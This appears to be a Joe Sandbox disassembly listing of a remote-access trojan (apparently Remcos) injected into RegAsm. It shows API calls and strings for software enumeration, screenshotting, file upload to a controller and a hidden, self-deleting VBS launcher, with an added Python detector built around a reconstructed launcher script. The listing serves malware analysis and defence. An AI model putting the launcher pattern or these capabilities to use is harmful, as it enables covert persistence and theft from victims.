                                                • API String ID: 3941738427-1684325040
                                                • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                • API String ID: 4218353326-230879103
                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$EnvironmentVariable
                                                • String ID:
                                                • API String ID: 1464849758-0
                                                • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                • API String ID: 1332880857-3714951968
                                                • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                APIs
                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                • String ID: Close
                                                • API String ID: 1657328048-3535843008
                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$Info
                                                • String ID:
                                                • API String ID: 2509303402-0
                                                • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                • __aulldiv.LIBCMT ref: 00408D88
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                • API String ID: 3086580692-2582957567
                                                • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                APIs
                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                • API String ID: 3795512280-1152054767
                                                • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                • _free.LIBCMT ref: 10007CFB
                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                • _free.LIBCMT ref: 10007D1D
                                                • _free.LIBCMT ref: 10007D32
                                                • _free.LIBCMT ref: 10007D3D
                                                • _free.LIBCMT ref: 10007D5F
                                                • _free.LIBCMT ref: 10007D72
                                                • _free.LIBCMT ref: 10007D80
                                                • _free.LIBCMT ref: 10007D8B
                                                • _free.LIBCMT ref: 10007DC3
                                                • _free.LIBCMT ref: 10007DCA
                                                • _free.LIBCMT ref: 10007DE7
                                                • _free.LIBCMT ref: 10007DFF
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                • _free.LIBCMT ref: 0045137F
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 004513A1
                                                • _free.LIBCMT ref: 004513B6
                                                • _free.LIBCMT ref: 004513C1
                                                • _free.LIBCMT ref: 004513E3
                                                • _free.LIBCMT ref: 004513F6
                                                • _free.LIBCMT ref: 00451404
                                                • _free.LIBCMT ref: 0045140F
                                                • _free.LIBCMT ref: 00451447
                                                • _free.LIBCMT ref: 0045144E
                                                • _free.LIBCMT ref: 0045146B
                                                • _free.LIBCMT ref: 00451483
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                • API String ID: 489098229-1431523004
                                                • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                APIs
                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                • API String ID: 1913171305-3159800282
                                                • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
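The strings of this function describe a launcher script: a .vbs written under Temp that runs CreateObject("WScript.Shell").Run "cmd /c ""<exepath>""", 0 and then CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), i.e. it restarts the executable with a hidden window and removes itself. The following Python is an added example for this page, not Remcos or Joe Sandbox code: it triages a dropped .vbs for that pattern by decoding VBScript string literals (a doubled quote inside a literal is one quote, which is why the fragment above ends in ""), recovering the launched path from the cmd /c wrapper, reading the window-style argument (0 hides the window) and flagging the self-delete call. Both scripts inside it are constructed for the example and the path C:\Users\victim\... is invented.

```python
"""Triage a dropped .vbs for the launch-then-self-delete pattern whose string
fragments appear in the listing above.  Added example for this page, not Remcos
or Joe Sandbox code; both scripts below are constructed, not recovered samples."""
import re

DROPPED = "\r\n".join([  # shape implied by the listing's fragments; path is invented
    r'CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\victim\AppData\Local\Temp\remcos.exe""", 0',
    r'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)',
])
BENIGN = "\r\n".join([   # an ordinary launcher: visible window, no self-delete
    r'Set sh = CreateObject("WScript.Shell")',
    r'sh.Run "notepad.exe", 1, True',
])

RUN_CALL = re.compile(r'\.Run\s+(?=")', re.I)           # .Run followed by a string literal
SELF_DELETE = re.compile(
    r'CreateObject\("Scripting\.FileSystemObject"\)\.DeleteFile\(\s*WScript\.ScriptFullName\s*\)', re.I)
CMD_C = re.compile(r'^cmd(?:\.exe)?\s+/c\s+"?(.+?)"?\s*$', re.I)
WINDOW_STYLE = re.compile(r"[ \t]*,[ \t]*(\d+)")         # Run's second argument

def vbs_string_literal(text, start):
    """Decode the VBScript string literal that begins at text[start] (a quote).
    Inside a literal a doubled quote is one quote; that is why the listing's
    fragment ends in 'cmd /c ""'.  Returns (value, index after closing quote)."""
    if text[start:start + 1] != '"':
        raise ValueError("no string literal at offset %d" % start)
    out, i = [], start + 1
    while i < len(text):
        if text[i] == '"':
            if text[i + 1:i + 2] == '"':
                out.append('"')
                i += 2
                continue
            return "".join(out), i + 1
        out.append(text[i])
        i += 1
    raise ValueError("unterminated string literal")

def triage_vbs(source):
    """Recover every Run target and report whether the script hides it and deletes itself."""
    launches = []
    for m in RUN_CALL.finditer(source):
        command, end = vbs_string_literal(source, m.end())
        style = WINDOW_STYLE.match(source, end)
        target = CMD_C.match(command)
        launches.append({
            "command": command,
            "target": target.group(1) if target else command,
            "hidden": style is not None and style.group(1) == "0",  # window style 0 = hidden
        })
    self_deletes = SELF_DELETE.search(source) is not None
    hidden_from_temp = any(l["hidden"] and "\\temp\\" in l["target"].lower() for l in launches)
    return {"launches": launches, "self_deletes": self_deletes,
            "suspicious": self_deletes and hidden_from_temp}

if __name__ == "__main__":
    for name, script in (("dropped", DROPPED), ("benign", BENIGN)):
        print(name, triage_vbs(script))
```

Run as a script it prints both verdicts; on a live host feed it the contents of each .vbs under %TEMP% instead of the constructed strings. The literal decoder matters because a naive regex on the raw text would either stop at the first doubled quote or swallow the trailing ", 0" that carries the hidden-window flag.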
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                • String ID:
                                                • API String ID: 3658366068-0
                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                APIs
                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                • GetFileType.KERNEL32 ref: 00455D82
                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                • GetLastError.KERNEL32 ref: 00455F31
                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID: \&G$\&G$`&G
                                                • API String ID: 269201875-253610517
                                                • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
